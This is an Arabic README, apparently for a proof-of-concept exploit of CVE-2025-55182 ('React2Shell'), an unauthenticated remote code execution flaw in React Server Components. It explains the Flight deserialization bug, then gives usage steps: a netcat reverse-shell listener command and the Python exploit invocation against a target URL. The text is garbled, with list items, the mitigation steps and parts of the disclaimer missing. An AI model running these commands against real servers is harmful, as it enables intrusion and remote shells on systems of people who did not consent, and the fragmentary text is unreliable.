
استغلال إثبات المفهوم لـ CVE-2025-55182 (React2Shell)، وهي ثغرة تنفيذ أكواد عن بُعد بدون مصادقة في React Server Components عبر حمولات بروتوكول Flight مصمّمة بعناية.
تُعد CVE-2025-55182، المعروفة أيضًا باسم React2Shell، ثغرة تنفيذ تعليمات برمجية عن بُعد (RCE) بدون مصادقة حرجة تؤثر على حزم React Server Components (الإصدارات 19.0 و19.1.0 و19.1.1 و19.2.0).
قد تسمح هذه الثغرة للمهاجمين بتحقيق تنفيذ عشوائي للتعليمات البرمجية على الخوادم المعرضة للخطر عبر طلب HTTP واحد مصمم بعناية، دون الحاجة إلى مصادقة.
تستخدم مكونات React Server بروتوكول Flight لتسلسل وإلغاء تسلسل بيانات المكونات المتبادلة بين العميل والخادم.
قد يسمح التحقق غير السليم أثناء عملية إلغاء التسلسل هذه بحمولات مصممة بعناية للتلاعب ببنى الكائنات الداخلية والوصول إلى بدائيات تنفيذ JavaScript الخطيرة.
تنشأ الثغرة من التحقق غير الكافي أثناء إلغاء تسلسل حمولات بروتوكول Flight الخاصة بمكونات React Server (RSC).
قد تؤدي الحمولات المصممة بعناية إلى:
multipart/form-data مصممًا بعنايةابدأ مستمعًا على جهازك:
nc -lvnp 4444
شغّل الاستغلال:
python3 CVE-2025-55182-React2Shell.py <TARGET_URL> <LHOST>
python3 CVE-2025-55182-React2Shell.py http://192.168.56.101:3000/ 192.168.56.100
للتخفيف من هذه الثغرة:
- OffSec – تحليل استغلال CVE-2025-55182
- Microsoft Security – الدفاع ضد React2Shell
- استشارة أمان React (الإفصاح الرسمي)
يُقدَّم هذا المشروع بشكل صارم من أجل:
لا يتحمل المؤلفون أي مسؤولية عن إساءة الاستخدام أو الأضرار الناجمة عن هذه المادة. يتحمل المستخدمون وحدهم مسؤولية الامتثال لجميع القوانين واللوائح المعمول بها.